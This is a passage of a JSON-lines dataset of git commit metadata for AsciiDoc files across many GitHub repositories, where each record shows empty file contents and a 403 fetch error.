(#652)\n\n","repos":"wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm-core,wildfly-swarm\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,kenfinnigan\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,wildfly-swarm\/wildfly-swarm-core,kenfinnigan\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,juangon\/wildfly-swarm,nelsongraca\/wildfly-swarm,wildfly-swarm\/wildfly-swarm,wildfly-swarm\/wildfly-swarm","old_file":"fractions\/javaee\/web\/README.adoc","new_file":"fractions\/javaee\/web\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly-swarm\/wildfly-swarm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"959d0123c34e193f1b8cc74ffdddf25663f19b83","subject":"y2b create post Madden 12 Hall Of Fame Edition Unboxing","message":"y2b create post Madden 12 Hall Of Fame Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-30-Madden-12-Hall-Of-Fame-Edition-Unboxing.adoc","new_file":"_posts\/2011-08-30-Madden-12-Hall-Of-Fame-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42ba6c4bc3fd122606358e8a4baa7b5e31b81e89","subject":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","message":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8cfc252c34125604ab7ae01503fdabe62c703da4","subject":"code of conduct","message":"code of conduct\n","repos":"trisberg\/jdbc,spring-cloud-stream-app-starters\/jdbc,trisberg\/jdbc","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trisberg\/jdbc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"43bddc932af3f1d608acfa96744ff59080c27a66","subject":"added code of conduct stolen @spring","message":"added code of conduct stolen @spring\n","repos":"pivio\/pivio-client","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pivio\/pivio-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1f5fc00012d337a115bbcf54254f06f9f9d0c875","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69aa1714a15481621481dc3d59992ffb75170be0","subject":"Update 2015-02-10-How-can-i-save.adoc","message":"Update 2015-02-10-How-can-i-save.adoc","repos":"sanglt\/sanglt.github.io,sanglt\/sanglt.github.io,sanglt\/sanglt.github.io","old_file":"_posts\/2015-02-10-How-can-i-save.adoc","new_file":"_posts\/2015-02-10-How-can-i-save.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sanglt\/sanglt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c42319c6f1a53eb6fbb2c8bcf2409ba19e15925","subject":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","message":"Update 2015-05-04-BIG-dataVistsSummer-20151.adoc","repos":"crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io,crazyrandom\/crazyrandom.github.io","old_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_file":"_posts\/2015-05-04-BIG-dataVistsSummer-20151.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crazyrandom\/crazyrandom.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e6eab343b1d30949730067627bba70f1d1e3473","subject":"y2b create post Unboxing Jack's New Laptop...","message":"y2b create post Unboxing Jack's New Laptop...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-04-Unboxing-Jacks-New-Laptop.adoc","new_file":"_posts\/2018-02-04-Unboxing-Jacks-New-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f52c560c49c7cd06b85698a6498947c5ab4be05a","subject":"README: typos fixed","message":"README: typos fixed","repos":"mikesir87\/arquillian-graphene,mikesir87\/arquillian-graphene,mikesir87\/arquillian-graphene,MatousJobanek\/arquillian-graphene,Vulcannis\/arquillian-graphene,MatousJobanek\/arquillian-graphene,Vulcannis\/arquillian-graphene,Vulcannis\/arquillian-graphene,mikesir87\/arquillian-graphene,rcormierastadia\/turnt-octo-cyril,rcormierastadia\/turnt-octo-cyril,MatousJobanek\/arquillian-graphene,rcormierastadia\/turnt-octo-cyril,MatousJobanek\/arquillian-graphene,Vulcannis\/arquillian-graphene","old_file":"extension\/screenshooter\/README.adoc","new_file":"extension\/screenshooter\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikesir87\/arquillian-graphene.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a4cb0b38fa9e13b36573ece6b5db33d816abfd61","subject":"Update 2016-09-04-Hugo-No-Go.adoc","message":"Update 2016-09-04-Hugo-No-Go.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-09-04-Hugo-No-Go.adoc","new_file":"_posts\/2016-09-04-Hugo-No-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65465f502507f1df3cd8e4c3d9f5892eecb6dd6a","subject":"CL: Files needed to add a private key to ssh-agent (edit)","message":"CL: Files needed to add a private key to ssh-agent (edit)\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"3931668a7b7e5d0cc64d738015c87fe7d328c1fc","subject":"Update 2017-03-27-Short-Poem.adoc","message":"Update 2017-03-27-Short-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-27-Short-Poem.adoc","new_file":"_posts\/2017-03-27-Short-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f05a29597a3007a27ae46a8b0a08c956f4f76fd5","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82c9da08eae394d17fd3fe4ffe5c6a2cf2084a9a","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de96f7cd8a1def6c21e6c63bb41acae68fd11e9d","subject":"Add new notes in asciidoc","message":"Add new notes in asciidoc","repos":"Bigomby\/practicas-comdig","old_file":"practica02\/notes.adoc","new_file":"practica02\/notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bigomby\/practicas-comdig.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62a093e3e2ecdc0608c91d2ac0011313b091ecd9","subject":"header","message":"header","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cf2b85f56932eb6a88e3d510c92bde8659d6d0c","subject":"Update 2016-08-22-Preserving-Content.adoc","message":"Update 2016-08-22-Preserving-Content.adoc","repos":"tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io","old_file":"_posts\/2016-08-22-Preserving-Content.adoc","new_file":"_posts\/2016-08-22-Preserving-Content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/tedbergeron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8b11780201aa6005988e59557b6e506fa29f454","subject":"Add file for documenting Unicode generated test files","message":"Add file for documenting Unicode generated test files\n\nContains information like:\n* List of Perl6 script used to update the tests\n* Roast Test File's generated\n* Version number the test was generated from\n* Date we last generated the file\n* File header of the test file, in case Unicode updates their test files\n (Unicode's files are all dated).\n","repos":"perl6\/roast,dogbert17\/roast,bitrauser\/roast,dogbert17\/roast,bitrauser\/roast","old_file":"docs\/unicode-generated-tests.asciidoc","new_file":"docs\/unicode-generated-tests.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dogbert17\/roast.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"70c2992bfa6658636939d4952794de882eff1037","subject":"[docs] KUDU-2395 Add nscd to requirements","message":"[docs] KUDU-2395 Add nscd to requirements\n\nChange-Id: Iad4db28297c08739b048dc46e398f7ddca80df48\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/13084\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d4cc274a81a79d46b6dc6d380fdb0459d23eb65e","subject":"Fix problem with numbered list in \"Build from Source\" instructions","message":"Fix problem with numbered list in \"Build from Source\" instructions\n\nChange-Id: I38ffd16cbfc2f99d955ea2c5ab9efdc84ad034c8\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1065\nTested-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c075a902755abdae549fdd659e3ce431833646cd","subject":"Update 2015-10-16-Crimson-Peak.adoc","message":"Update 2015-10-16-Crimson-Peak.adoc","repos":"heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io","old_file":"_posts\/2015-10-16-Crimson-Peak.adoc","new_file":"_posts\/2015-10-16-Crimson-Peak.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heartnn\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd6950c5b9f9313001dafe4911c537797d1f5bcf","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b19e488cd36bfe3b44e22126863c532051732a92","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55d2faed94077ced16b736ca5e499022b0aa4789","subject":"[docs] Adjust latency and bandwidth limitations","message":"[docs] Adjust latency and bandwidth limitations\n\nAdjusts the documentation for latency and bandwidth\nlimitations to be a bit more conservative. Additionally,\nremoves any reference to DC\/AZ deployments given\nwe are primarily concerned about latency and bandwidth\nas the concrete limitations.\n\nChange-Id: I42fe8a65779c3f5ad366403366e534fa28713a76\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12970\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@apache.org>\n","repos":"InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu","old_file":"docs\/known_issues.adoc","new_file":"docs\/known_issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"40483648f5aa2cb5907ad1434fe19ceef6e79673","subject":"update structure + add uuid examples","message":"update structure + add uuid examples\n","repos":"adoc-editor\/editor-backend","old_file":"doc\/json\/datas-structure.adoc","new_file":"doc\/json\/datas-structure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5731bc2f81215c2c1dbdb8269285ca3edbfcea34","subject":"Update 2015-10-27-north_india_trip_delhi_crime_capital.adoc","message":"Update 2015-10-27-north_india_trip_delhi_crime_capital.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-27-north_india_trip_delhi_crime_capital.adoc","new_file":"_posts\/2015-10-27-north_india_trip_delhi_crime_capital.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f960f5f7a810620303ff182e894d5d1b00f3e0c7","subject":"Python note: Using Python Anaconda distribution as a virtual environment","message":"Python note: Using Python Anaconda distribution as a virtual environment\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4273858e4ff8916d850ae08a1c4b61839326ae77","subject":"PLATSERV-184: Quitado un \"the\" sobrante","message":"PLATSERV-184: Quitado un \"the\" sobrante\n","repos":"serenity-devstack\/spring-cloud-services-connector","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/serenity-devstack\/spring-cloud-services-connector.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bfbc829ab265b1ab953320768882fc7877130b43","subject":"Minimal doc for ZestPlugin #259","message":"Minimal doc for ZestPlugin #259\n","repos":"werval\/werval,werval\/werval,werval\/werval,werval\/werval","old_file":"io.werval.modules\/io.werval.modules.zest\/src\/doc\/index.adoc","new_file":"io.werval.modules\/io.werval.modules.zest\/src\/doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/werval\/werval.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e36f9cc419e2fea37e3650cd5f0fde8933af7236","subject":"added documentation file","message":"added documentation file\n","repos":"svenkubiak\/mangooio,svenkubiak\/mangooio,dmarko484\/mangooio,svenkubiak\/mangooio,dmarko484\/mangooio","old_file":"mangooio-core\/src\/main\/documentation\/documentation.asciidoc","new_file":"mangooio-core\/src\/main\/documentation\/documentation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/svenkubiak\/mangooio.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d9de9f834fa699c7766303bace7962a7ffb63fac","subject":"Update 2017-10-28-.adoc","message":"Update 2017-10-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-28-.adoc","new_file":"_posts\/2017-10-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"127136e6bfcdeaa3512c5a1dbb80fd7391014307","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b7294607757bf8bbabb6edfb20789d88ff408bc","subject":"Additions to documentation regarding caching functionality","message":"Additions to documentation regarding caching functionality\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f8e45e93553b074d2f782490bb676733d499c35b","subject":"Changed the documentation for XPath extension function external:exec-external(); added new parameter.","message":"Changed the documentation for XPath extension function external:exec-external(); added new parameter.\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"581ece82475e36de31f3dfc1ec2a29ff744d04db","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d60caab1fa486e2ece24d3721d5154e1d3bcea36","subject":"Publish 2016-12-9-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","message":"Publish 2016-12-9-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","repos":"IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog,IEEECompute\/blog","old_file":"2016-12-9-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","new_file":"2016-12-9-IEEE-Day-Story-IEEE-THDC-IHET-SB.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IEEECompute\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"939e7d320fb90a6d43fd3386a48fbb6b051a4d37","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11a7cd34fbb63dc8a8b7378364e57fc1b988e3fb","subject":"readme","message":"readme\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"quarkus\/infinispan-demo\/readme.adoc","new_file":"quarkus\/infinispan-demo\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2da4cc681fc5638fca70cb357368693a49d0092b","subject":"Update 2015-11-19-Ejecutar-comandos-con-listas-de-directorios.adoc","message":"Update 2015-11-19-Ejecutar-comandos-con-listas-de-directorios.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-19-Ejecutar-comandos-con-listas-de-directorios.adoc","new_file":"_posts\/2015-11-19-Ejecutar-comandos-con-listas-de-directorios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e946d413f49b1e301b483468369c79ca3993bca8","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"730e7082fcbe4beec6514057fbb3f253c5343dc4","subject":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","message":"Update 2016-05-04-Wordpress-Settings-A-P-I.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_file":"_posts\/2016-05-04-Wordpress-Settings-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a69a1e1133e381ab76e68e79c9cbbd52be54db46","subject":"y2b create post McDonald's Made A Boombox???","message":"y2b create post McDonald's Made A Boombox???","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-23-McDonalds-Made-A-Boombox.adoc","new_file":"_posts\/2017-08-23-McDonalds-Made-A-Boombox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7dba7e56cbbd386cdab2784369a0bc6090d3a0f","subject":"Publish 2016-6-26-first-title.adoc","message":"Publish 